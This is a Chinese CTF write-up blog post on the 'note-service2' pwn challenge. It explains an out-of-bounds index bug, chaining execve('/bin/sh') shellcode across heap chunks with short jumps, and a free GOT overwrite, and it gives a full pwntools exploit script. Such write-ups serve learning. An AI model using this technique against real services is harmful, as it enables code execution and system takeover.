<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-flash.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-48x48-next.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Pwn," />










<meta name="description" content="前言做到的第一个堆题，对我来说还是有丶难度，遂记录一下。 题目分析首先checksec一下：  堆栈数据可执行，且存在可写入的段，根据我的经验来说这种情况一般是走ret2shellcode。 然后IDA反汇编看一下程序逻辑，这里直接看漏洞点：  这里由于数组索引存在越界，所以我们通过修改索引，可以实现任意地址写。 解题思路既然我们可以在堆内写入内容，这里就考虑在分配的堆块中写入shellcode，">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界-note-service2">
<meta property="og:url" content="https://www.sketchplane.top/2020/10/08/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-note-service2/index.html">
<meta property="og:site_name" content="sketch_pl4ne">
<meta property="og:description" content="前言做到的第一个堆题，对我来说还是有丶难度，遂记录一下。 题目分析首先checksec一下：  堆栈数据可执行，且存在可写入的段，根据我的经验来说这种情况一般是走ret2shellcode。 然后IDA反汇编看一下程序逻辑，这里直接看漏洞点：  这里由于数组索引存在越界，所以我们通过修改索引，可以实现任意地址写。 解题思路既然我们可以在堆内写入内容，这里就考虑在分配的堆块中写入shellcode，">
<meta property="og:image" content="https://i.loli.net/2020/10/08/huyNLRGxwdtjn4p.png">
<meta property="og:image" content="https://i.loli.net/2020/10/08/TtUA5MKvbaImLke.png">
<meta property="og:image" content="https://i.loli.net/2020/10/08/8LODpFj9dbX3REk.png">
<meta property="og:image" content="https://i.loli.net/2020/10/08/NpSl9dWwfaOLHGK.png">
<meta property="article:published_time" content="2020-10-08T15:15:36.000Z">
<meta property="article:modified_time" content="2020-10-08T15:20:08.896Z">
<meta property="article:author" content="sketch_pl4ne">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/10/08/huyNLRGxwdtjn4p.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://www.sketchplane.top/2020/10/08/攻防世界-note-service2/"/>





  <title>攻防世界-note-service2 | sketch_pl4ne</title>
  








<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="sketch_pl4ne" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
    <link rel="stylesheet" href="/dist/APlayer.min.css">
    <div id="aplayer"></div>
    <script type="text/javascript" src="/dist/APlayer.min.js"></script>
    <script type="text/javascript" src="/dist/music.js"></script>
  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">sketch_pl4ne</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://www.sketchplane.top/2020/10/08/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-note-service2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="sketch_pl4ne">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="sketch_pl4ne">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">攻防世界-note-service2</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-10-08T23:15:36+08:00">
                2020-10-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 阅读数
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>次
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  773
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  3
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>做到的第一个堆题，对我来说还是有丶难度，遂记录一下。</p>
<h2 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h2><p>首先checksec一下：</p>
<p><img src="https://i.loli.net/2020/10/08/huyNLRGxwdtjn4p.png" alt="checksec"></p>
<p>堆栈数据可执行，且存在可写入的段，根据我的经验来说这种情况一般是走ret2shellcode。</p>
<p>然后IDA反汇编看一下程序逻辑，这里直接看漏洞点：</p>
<p><img src="https://i.loli.net/2020/10/08/TtUA5MKvbaImLke.png" alt="ida_code"></p>
<p>这里由于数组索引存在越界，所以我们通过修改索引，可以实现任意地址写。</p>
<h2 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h2><p>既然我们可以在堆内写入内容，这里就考虑在分配的堆块中写入shellcode，但是由于每个堆块最多只能写入7字节，所以我们这里将shellcode分开写入多个堆块中，再使用 <code>jmp short xxx</code> 来跳转。</p>
<p>接下来的问题是这个xxx是多少，这个是有公式的：</p>
<p><code>xxx = 目标地址 - 当前地址 - 命令长度</code></p>
<p><img src="https://i.loli.net/2020/10/08/8LODpFj9dbX3REk.png" alt="chunk_offset"></p>
<p>那么根据公式计算：xxx = 2+1+8+8+8 - 2 = 0x19</p>
<p>跳转的问题解决了，接下来可以开始构造shellcode链</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mov rdi, xxx   ;xxx&#x3D;&amp;(&quot;&#x2F;bin&#x2F;sh&quot;)  </span><br><span class="line">xor rsi,rsi    ;rsi&#x3D;0，不用 mov xxx,0 是因为超过长度了</span><br><span class="line">mov rax, 0x3b  ;rax&#x3D;0x3b 占4字节</span><br><span class="line">xor rdx,rdx    ;rdx&#x3D;0 占2字节</span><br><span class="line">syscall 			 ;占2字节</span><br></pre></td></tr></table></figure>

<p><strong>ps:</strong> 使用<code>enhex(asm(&#39;xor rsi, rsi&#39;))</code>可以查看汇编代码对应机器码的十六进制长度。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">asm(<span class="string">"xor rsi,rsi"</span>)+<span class="string">"\x90\x90\xeb\x19"</span></span><br><span class="line">asm(<span class="string">"mov rax,0x3b"</span>)+<span class="string">"\xeb\x19"</span></span><br><span class="line">asm(<span class="string">"xor rdx,rdx"</span>)+<span class="string">"\x90\x90\xeb\x19"</span></span><br><span class="line">asm(<span class="string">"syscall"</span>).ljust(<span class="number">7</span>,<span class="string">"\x90"</span>)</span><br></pre></td></tr></table></figure>

<p>后面的语句都好写，但是第一条给rdi传参无论怎么写都会超长，这里需要另谋他法：</p>
<ol>
<li>申请一个堆块A，填入内容为<code>/bin/sh</code></li>
<li>修改free函数got表内容，使其被调用后跳转到下一个堆块</li>
<li>调用free(A)，根据传参规则，此时rdi里就会是<code>/bin/sh</code>的地址，并且启动整个堆块链</li>
</ol>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">'./note-service2'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./note-service2'</span>)</span><br><span class="line">context.update(arch =<span class="string">'amd64'</span>)</span><br><span class="line"></span><br><span class="line">heap_addr = <span class="number">0x2020a0</span></span><br><span class="line">free_got = elf.got[<span class="string">'free'</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(index, content)</span>:</span></span><br><span class="line">    io.sendlineafter(<span class="string">'your choice&gt;&gt;'</span>, <span class="string">"1"</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">'index:'</span>, str(index))</span><br><span class="line">    io.sendlineafter(<span class="string">'size:'</span>, <span class="string">"8"</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">'content:'</span>, content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span><span class="params">(index)</span>:</span></span><br><span class="line">    io.sendlineafter(<span class="string">'your choice&gt;&gt;'</span>, <span class="string">"4"</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">'index:'</span>, str(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="string">'/bin/sh'</span>)</span><br><span class="line">add((free_got-heap_addr)/<span class="number">8</span>, asm(<span class="string">'xor rsi, rsi'</span>)+<span class="string">b"\x90\x90\xeb\x19"</span>)</span><br><span class="line">add(<span class="number">1</span>, asm(<span class="string">'mov eax, 0x3b'</span>)+<span class="string">b"\xeb\x19"</span>)</span><br><span class="line">add(<span class="number">2</span>, asm(<span class="string">'xor rdx, rdx'</span>)+<span class="string">b"\x90\x90\xeb\x19"</span>)</span><br><span class="line">add(<span class="number">3</span>, asm(<span class="string">'syscall'</span>).rjust(<span class="number">7</span>, <span class="string">b'\x90'</span>)  <span class="comment"># ljust/rjust 在这里没有区别</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p><strong>注意：</strong></p>
<p>这里我看其他师傅写的wp时有个疑惑的地方，这里<code>free_got-heap_addr</code>的值是<code>-17</code>，也就是说dele(0)在把<code>/bin/sh</code>弹入rdi后，是从array[-17]开始执行的，下一个堆块是array[1]，但是<code>jmp short xxx</code>时的offset依然是0x19，由于我对堆块的分配规则不太熟悉，这里我思考了许久，猜测<strong>堆块</strong>是以<strong>类似链表</strong>的形式连在一起的，按照创建的先后顺序依次链接，所以才会-17之后是1这样，而不能被之前那张计算偏移的图所误导。</p>
<p><img src="https://i.loli.net/2020/10/08/NpSl9dWwfaOLHGK.png" alt="chunk_link"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>害，想加师傅好友问清楚是不是我想的那样，现在还没通过申请2333</p>
<p>睡了睡了！</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Pwn/" rel="tag"># Pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/09/09/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-welpwn/" rel="next" title="攻防世界-welpwn">
                <i class="fa fa-chevron-left"></i> 攻防世界-welpwn
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/10/25/IDEA%E5%8A%A0%E5%AF%86%E7%AE%97%E6%B3%95/" rel="prev" title="IDEA加密算法">
                IDEA加密算法 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="sketch_pl4ne" />
            
              <p class="site-author-name" itemprop="name">sketch_pl4ne</p>
              <p class="site-description motion-element" itemprop="description">世上的不公都是当事人能力不足导致的</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">31</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhaoj.in/" title="glzjin" target="_blank">glzjin</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://lihuaiqiu.github.io/" title="离怀秋" target="_blank">离怀秋</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/wfzWebSecuity/" title="tr1ple" target="_blank">tr1ple</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://southsea.st/" title="南溟" target="_blank">南溟</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#题目分析"><span class="nav-number">2.</span> <span class="nav-text">题目分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题思路"><span class="nav-number">3.</span> <span class="nav-text">解题思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#exp"><span class="nav-number">4.</span> <span class="nav-text">exp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">5.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>
    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sketch_pl4ne</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">41.4k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
